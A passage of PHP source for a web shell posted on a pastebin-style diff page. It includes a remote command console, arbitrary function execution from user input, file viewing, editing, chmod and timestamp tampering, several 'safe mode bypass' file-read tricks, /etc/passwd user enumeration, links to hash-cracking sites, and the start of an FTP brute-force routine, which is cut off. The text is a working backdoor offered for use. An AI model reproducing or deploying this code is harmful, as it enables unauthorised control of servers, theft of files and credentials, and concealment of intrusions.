    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>

628

    </form></table></div>

629

    <?php

630

    printFooter();

631

633

function actionStringTools() {

634

    if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}

635

    if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}

636

    if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}

637

    if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}

639

    if(isset($_POST['ajax'])) {

640

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

641

        ob_start();

642

        if(function_exists($_POST['p1']))

643

            echo $_POST['p1']($_POST['p2']);

644

        $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";

645

        echo strlen($temp), "\n", $temp;

646

        exit;

647

648

    printHeader();

649

    echo '<h1>String conversions</h1><div class=content>';

650

    $stringTools = array(

651

        'Base64 encode' => 'base64_encode',

652

        'Base64 decode' => 'base64_decode',

653

        'Url encode' => 'urlencode',

654

        'Url decode' => 'urldecode',

655

        'Full urlencode' => 'full_urlencode',

656

        'md5 hash' => 'md5',

657

        'sha1 hash' => 'sha1',

658

        'crypt' => 'crypt',

659

        'CRC32' => 'crc32',

660

        'ASCII to HEX' => 'ascii2hex',

661

        'HEX to ASCII' => 'hex2ascii',

662

        'HEX to DEC' => 'hexdec',

663

        'HEX to BIN' => 'hex2bin',

664

        'DEC to HEX' => 'dechex',

665

        'DEC to BIN' => 'decbin',

666

        'BIN to HEX' => 'bin2hex',

667

        'BIN to DEC' => 'bindec',

668

        'String to lower case' => 'strtolower',

669

        'String to upper case' => 'strtoupper',

670

        'Htmlspecialchars' => 'htmlspecialchars',

671

        'String length' => 'strlen',

672

);

673

    if(empty($_POST['ajax'])&&!empty($_POST['p1']))

674

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

675

    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";

676

    foreach($stringTools as $k => $v)

677

        echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";

678

        echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";

679

    if(!empty($_POST['p1'])) {

680

        if(function_exists($_POST['p1']))

681

        echo htmlspecialchars($_POST['p1']($_POST['p2']));

682

683

    echo"</pre></div>";

684

?>

685

    <br><h1>Search for hash:</h1><div class=content>

686

        <form method='post' target='_blank' name="hf">

687

            <input type="text" name="hash" style="width:200px;"><br>

688

            <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>

689

            <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br>

690

            <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br>

691

            <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>

692

            <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>

693

        </form>

694

    </div>

695

    <?php

696

    printFooter();

697

699

function actionFilesTools() {

700

    if( isset($_POST['p1']) )

701

        $_POST['p1'] = urldecode($_POST['p1']);

702

    if(@$_POST['p2']=='download') {

703

        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {

704

            ob_start("ob_gzhandler", 4096);

705

            header("Content-Disposition: attachment; filename=".basename($_POST['p1']));

706

            if (function_exists("mime_content_type")) {

707

                $type = @mime_content_type($_POST['p1']);

708

                header("Content-Type: ".$type);

709

710

            $fp = @fopen($_POST['p1'], "r");

711

            if($fp) {

712

                while(!@feof($fp))

713

                    echo @fread($fp, 1024);

714

                fclose($fp);

715

716

        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {

718

719

        exit;

720

721

    if( @$_POST['p2'] == 'mkfile' ) {

722

        if(!file_exists($_POST['p1'])) {

723

            $fp = @fopen($_POST['p1'], 'w');

724

            if($fp) {

725

                $_POST['p2'] = "edit";

726

                fclose($fp);

727

728

729

730

    printHeader();

731

    echo '<h1>File tools</h1><div class=content>';

732

    if( !file_exists(@$_POST['p1']) ) {

733

        echo 'File not exists';

734

        printFooter();

735

        return;

736

737

    $uid = @posix_getpwuid(@fileowner($_POST['p1']));

738

    $gid = @posix_getgrgid(@fileowner($_POST['p1']));

739

    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';

740

    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';

741

    if( empty($_POST['p2']) )

742

        $_POST['p2'] = 'view';

743

    if( is_file($_POST['p1']) )

744

        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');

745

    else

746

        $m = array('Chmod', 'Rename', 'Touch');

747

    foreach($m as $v)

748

        echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';

749

    echo '<br><br>';

750

    switch($_POST['p2']) {

751

        case 'view':

752

            echo '<pre class=ml1>';

753

            $fp = @fopen($_POST['p1'], 'r');

754

            if($fp) {

755

                while( !@feof($fp) )

756

                    echo htmlspecialchars(@fread($fp, 1024));

757

                @fclose($fp);

758

759

            echo '</pre>';

760

            break;

761

        case 'highlight':

762

            if( is_readable($_POST['p1']) ) {

763

                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';

764

                $code = highlight_file($_POST['p1'],true);

765

                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';

766

767

            break;

768

        case 'chmod':

769

            if( !empty($_POST['p3']) ) {

770

                $perms = 0;

771

                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)

772

                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));

773

                if(!@chmod($_POST['p1'], $perms))

774

                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';

775

                else

776

                    die('<script>g(null,null,null,null,"")</script>');

777

778

            echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';

779

            break;

780

        case 'edit':

781

            if( !is_writable($_POST['p1'])) {

782

                echo 'File isn\'t writeable';

783

                break;

784

785

            if( !empty($_POST['p3']) ) {

786

                @file_put_contents($_POST['p1'],$_POST['p3']);

787

                echo 'Saved!<br><script>document.mf.p3.value="";</script>';

788

789

            echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';

790

            $fp = @fopen($_POST['p1'], 'r');

791

            if($fp) {

792

                while( !@feof($fp) )

793

                    echo htmlspecialchars(@fread($fp, 1024));

794

                @fclose($fp);

795

796

            echo '</textarea><input type=submit value=">>"></form>';

797

            break;

798

        case 'hexdump':

799

            $c = @file_get_contents($_POST['p1']);

800

            $n = 0;

801

            $h = array('00000000<br>','','');

802

            $len = strlen($c);

803

            for ($i=0; $i<$len; ++$i) {

804

                $h[1] .= sprintf('%02X',ord($c[$i])).' ';

805

                switch ( ord($c[$i]) ) {

806

                    case 0:  $h[2] .= ' '; break;

807

                    case 9:  $h[2] .= ' '; break;

808

                    case 10: $h[2] .= ' '; break;

809

                    case 13: $h[2] .= ' '; break;

810

                    default: $h[2] .= $c[$i]; break;

811

812

                $n++;

813

                if ($n == 32) {

814

                    $n = 0;

815

                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}

816

                    $h[1] .= '<br>';

817

                    $h[2] .= "\n";

818

819

820

            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';

821

            break;

822

        case 'rename':

823

            if( !empty($_POST['p3']) ) {

824

                if(!@rename($_POST['p1'], $_POST['p3']))

825

                    echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';

826

                else

827

                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');

828

829

            echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';

830

            break;

831

        case 'touch':

832

            if( !empty($_POST['p3']) ) {

833

                $time = strtotime($_POST['p3']);

834

                if($time) {

835

                    if(@touch($_POST['p1'],$time,$time))

836

                        die('<script>g(null,null,null,null,"")</script>');

837

                    else {

838

                        echo 'Fail!<script>document.mf.p3.value="";</script>';

839

840

                } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';

841

842

            echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';

843

            break;

844

        case 'mkfile':

846

            break;

847

848

    echo '</div>';

849

    printFooter();

850

852

function actionSafeMode() {

853

    $temp='';

854

    ob_start();

855

    switch($_POST['p1']) {

856

        case 1:

857

            $temp=@tempnam($test, 'cx');

858

            if(@copy("compress.zlib://".$_POST['p2'], $temp)){

859

                echo @file_get_contents($temp);

860

                unlink($temp);

861

            } else

862

                echo 'Sorry... Can\'t open file';

863

            break;

864

        case 2:

865

            $files = glob($_POST['p2'].'*');

866

            if( is_array($files) )

867

                foreach ($files as $filename)

868

                    echo $filename."\n";

869

            break;

870

        case 3:

871

            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);

872

            curl_exec($ch);

873

            break;

874

        case 4:

875

            ini_restore("safe_mode");

876

            ini_restore("open_basedir");

877

            include($_POST['p2']);

878

            break;

879

        case 5:

880

            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {

881

                $uid = @posix_getpwuid($_POST['p2']);

882

                if ($uid)

883

                    echo join(':',$uid)."\n";

884

885

            break;

886

        case 6:

887

            if(!function_exists('imap_open'))break;

888

            $stream = imap_open($_POST['p2'], "", "");

889

            if ($stream == FALSE)

890

                break;

891

            echo imap_body($stream, 1);

892

            imap_close($stream);

893

            break;

894

895

    $temp = ob_get_clean();

896

    printHeader();

897

    echo '<h1>Safe mode bypass</h1><div class=content>';

898

    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';

899

    if($temp)

900

        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';

901

    echo '</div>';

902

    printFooter();

903

905

function actionConsole() {

906

    if(isset($_POST['ajax'])) {

907

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

908

        ob_start();

909

        echo "document.cf.cmd.value='';\n";

910

        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));

911

        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {

912

            if(@chdir($match[1])) {

913

                $GLOBALS['cwd'] = @getcwd();

914

                echo "document.mf.c.value='".$GLOBALS['cwd']."';";

915

916

917

        echo "document.cf.output.value+='".$temp."';";

918

        echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";

919

        $temp = ob_get_clean();

920

        echo strlen($temp), "\n", $temp;

921

        exit;

922

923

    printHeader();

924

?>

925

<script>

926

if(window.Event) window.captureEvents(Event.KEYDOWN);

927

var cmds = new Array("");

928

var cur = 0;

929

function kp(e) {

930

    var n = (window.Event) ? e.which : e.keyCode;

931

    if(n == 38) {

932

        cur--;

933

        if(cur>=0)

934

            document.cf.cmd.value = cmds[cur];

935

        else

936

            cur++;

937

    } else if(n == 40) {

938

        cur++;

939

        if(cur < cmds.length)

940

            document.cf.cmd.value = cmds[cur];

941

        else

942

            cur--;

943

944

945

function add(cmd) {

946

    cmds.pop();

947

    cmds.push(cmd);

948

    cmds.push("");

949

    cur = cmds.length-1;

950

951

</script>

952

<?php

953

    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';

954

    foreach($GLOBALS['aliases'] as $n => $v) {

955

        if($v == '') {

956

            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';

957

            continue;

958

959

        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';

960

961

    if(empty($_POST['ajax'])&&!empty($_POST['p1']))

962

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

963

    echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';

964

    if(!empty($_POST['p1'])) {

965

        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));

966

967

    echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';

968

    echo '</form></div><script>document.cf.cmd.focus();</script>';

969

    printFooter();

970

972

function actionLogout() {

973

    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);

974

    echo 'bye!';

975

977

function actionSelfRemove() {

978

    printHeader();

979

    if($_POST['p1'] == 'yes') {

980

        if(@unlink(SELF_PATH))

981

            die('Shell has been removed');

982

        else

983

            echo 'unlink error!';

984

985

    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';

986

    printFooter();

987

989

function actionBruteforce() {

990

    printHeader();

991

    if( isset($_POST['proto']) ) {

992

        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';

993

        if( $_POST['proto'] == 'ftp' ) {

994

            function bruteForce($ip,$port,$login,$pass) {

995

                $fp = @ftp_connect($ip, $port?$port:21);

996

                if(!$fp) return false;

997

                $res = @ftp_login($fp, $login, $pass);

998

                @ftp_close($fp);

999

                return $res;

1000

Recent Posts

Difference between
modified post 1071533 by Anonymous on Sun 19th Aug 01:55 and
original post 1071455 by Anonymous on Sat 18th Aug 05:57
Show old version | new version | both versions

Recent Posts

Difference betweenmodified post 1071533 by Anonymous on Sun 19th Aug 01:55 andoriginal post 1071455 by Anonymous on Sat 18th Aug 05:57Show old version | new version | both versions

Difference between
modified post 1071533 by Anonymous on Sun 19th Aug 01:55 and
original post 1071455 by Anonymous on Sat 18th Aug 05:57
Show old version | new version | both versions